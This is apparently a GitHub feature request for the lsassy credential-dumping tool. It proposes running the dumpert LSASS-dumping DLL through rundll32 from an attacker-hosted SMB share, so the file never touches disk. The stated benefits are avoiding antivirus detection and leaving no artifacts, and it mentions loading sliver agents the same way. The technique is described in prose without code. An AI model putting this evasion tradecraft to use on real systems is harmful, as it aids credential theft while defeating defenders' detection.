[Feature] Optionally use UNC path with dumpertdll
module to run dumpert DLL from SMB share
#61
Labels
enhancement
New feature or request
Hello! First I would like to say congratulations on the 3.0.0 release, the new improvements look awesome! I had an idea while reading some of the new dumping methods, specifically dumpertdll.
rundll32
can run DLLs from SMB shares, they don't have to be on the disk. My idea was to run an SMB share (like withSamba
orimpacket-smbshare
, not lsassy) and then place the dumpert DLL file in that share. You could then provide the UNC path to the dumpert DLL in the "dumpertdll_path" option, and lsassy would tellrundll32
to call the dumpert DLL from the SMB share, instead of having to upload it.I've had lots of luck with this method when trying to spawn
sliver
agents using a DLL loaded from an SMB share, and it would also prevent the OPSEC hit of having to upload the file to disk. Finally, if something goes wrong during the dump (like AV gets wind of what your doing) there is no risk of the dumpert DLL persisting after aborted execution because it couldn't be deleted.The text was updated successfully, but these errors were encountered: